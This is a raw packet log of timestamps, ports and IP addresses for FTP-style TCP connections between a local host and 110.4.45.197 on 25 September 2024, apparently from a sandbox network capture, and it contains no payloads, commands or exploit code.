                              Sep 25, 2024 14:45:22.420850992 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.420950890 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.421000957 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.422202110 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.426177025 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.746551991 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:22.747558117 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:22.752363920 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:23.947084904 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:23.947314978 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:23.947805882 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:23.947875023 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:23.948149920 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:23.948205948 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:24.326988935 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:24.988107920 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:24.989223003 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:24.989315033 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:24.989315033 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:24.993861914 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:25.204895973 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:25.317061901 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:25.317339897 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:25.323427916 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:26.487792969 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:26.488765955 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:26.488816023 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:26.488945961 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:26.489006996 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:26.489006996 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:26.720679998 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:26.720757008 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:26.721489906 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:27.044569969 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:27.045316935 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:27.050245047 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.273814917 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.274068117 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.274312973 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.274665117 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.275059938 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.275103092 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.275103092 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.282768965 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.291805983 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:28.291870117 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.299405098 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:28.304227114 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.132098913 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.132430077 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.137347937 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.137362003 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.137372017 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.137382030 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.137392998 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.137433052 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.137481928 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.142193079 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142206907 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142216921 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142226934 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142235041 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142255068 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142265081 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142273903 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.142277002 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142287016 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.142317057 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.142347097 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.142363071 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.147042036 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.147054911 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.147165060 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.151915073 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.152673006 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.152806997 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.157519102 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.157552004 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.157562971 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158766985 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158776999 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158786058 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158793926 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158802986 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158812046 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158819914 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158828020 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158837080 CEST5451065041110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:29.158956051 CEST6504154510192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.221259117 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:29.942749023 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:30.030123949 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.630347967 CEST6504221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.982853889 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:30.983236074 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:30.983270884 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.983546019 CEST2165040110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:30.983581066 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.983911991 CEST2165042110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:30.983999968 CEST6504021192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.984000921 CEST6504221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:30.991202116 CEST6504221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:31.196229935 CEST2165042110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:31.198574066 CEST6504221192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:37.245209932 CEST6504321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:37.255342960 CEST2165043110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:37.257318974 CEST6504321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:37.261321068 CEST6504321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:37.271764040 CEST2165043110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:37.273313999 CEST6504321192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:40.285402060 CEST6504421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:40.290483952 CEST2165044110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:40.290560007 CEST6504421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:40.290796041 CEST6504421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:40.296174049 CEST2165044110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:40.296235085 CEST6504421192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:58.989283085 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:58.994298935 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:58.994457960 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:59.895040035 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:45:59.895211935 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:45:59.900120974 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:00.261992931 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:00.263067961 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:00.267971039 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:00.671087027 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:00.671309948 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:00.676263094 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.057591915 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.058243990 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:01.063272953 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.437719107 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.437848091 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:01.442898035 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.818774939 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:01.818973064 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:01.823784113 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:02.210742950 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:02.211282969 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:02.216226101 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:02.216367006 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:02.216464043 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:02.221261024 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.095990896 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.097570896 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.109357119 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109509945 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109524965 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109554052 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109566927 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109579086 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109608889 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.109631062 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.109671116 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.111073017 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.111087084 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.111116886 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.111188889 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.124712944 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124727011 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124738932 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124768972 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124798059 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124813080 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.124871016 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.126276016 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.126605988 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126619101 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126646996 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126665115 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.126720905 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.130489111 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.138257980 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.139955044 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140079021 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140084982 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140734911 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.140801907 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.142123938 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.142129898 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.144275904 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.157512903 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.162501097 CEST5897865046110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:03.169303894 CEST6504658978192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:03.237051964 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:04.061877012 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:04.233382940 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.003916979 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.015419960 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.407233953 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.408917904 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.417830944 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:05.418198109 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.418234110 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:05.424572945 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.289006948 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.290004969 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.304903030 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304936886 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304965019 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.304965019 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305008888 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305205107 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305248022 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305275917 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305305958 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305473089 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305521965 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305521965 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305576086 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.305617094 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305646896 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.305690050 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.307404041 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.307456970 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.324974060 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.324990988 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325005054 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325027943 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325062037 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325078011 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325412035 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325424910 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325438023 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325449944 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325483084 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325493097 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325495005 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.325535059 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.325581074 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.326847076 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.326910973 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.328279018 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.328371048 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.340783119 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.340845108 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.340904951 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.340918064 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341016054 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.341162920 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341222048 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.341486931 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.341499090 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.342278004 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.342890024 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350264072 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350294113 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350322008 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.350333929 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351314068 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351342916 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351370096 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351382017 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351444006 CEST5682065047110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:06.351516008 CEST6504756820192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:06.420878887 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:07.118069887 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:07.233377934 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:09.978199005 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:09.990195990 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.324100971 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.324153900 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.324235916 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.324565887 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.339101076 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.350428104 CEST2165048110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.350492001 CEST6504821192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.707081079 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.710944891 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.735255003 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:10.735379934 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.735522032 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:10.769364119 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.621846914 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.622195959 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627837896 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627852917 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627866983 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627880096 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627891064 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627897024 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627904892 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627918959 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627923012 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627932072 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627943993 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627948999 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.627958059 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.627985954 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.628016949 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635231972 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635262966 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635286093 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635289907 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635318995 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635329008 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635354996 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635377884 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.635642052 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.635766029 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.637626886 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.637655973 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.637681961 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.637723923 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.638622046 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.638681889 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.639272928 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.639354944 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.640543938 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.640574932 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.640603065 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.642788887 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.642817020 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.642844915 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644583941 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644742012 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644768953 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.644795895 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.645900011 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.645929098 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.646581888 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.647202969 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.647229910 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648854017 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648883104 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648910046 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648950100 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.648977041 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649003983 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649032116 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649059057 CEST5285165049110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:11.649116993 CEST6504952851192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:11.733412981 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:12.597202063 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:12.717811108 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:13.977505922 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.009562969 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.397054911 CEST2165045110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.397623062 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.402712107 CEST6006265050110.4.45.197192.168.2.9
                              Sep 25, 2024 14:46:14.402786016 CEST6505060062192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.402879953 CEST6504521192.168.2.9110.4.45.197
                              Sep 25, 2024 14:46:14.408317089 CEST2165045110.4.45.197192.168.2.9
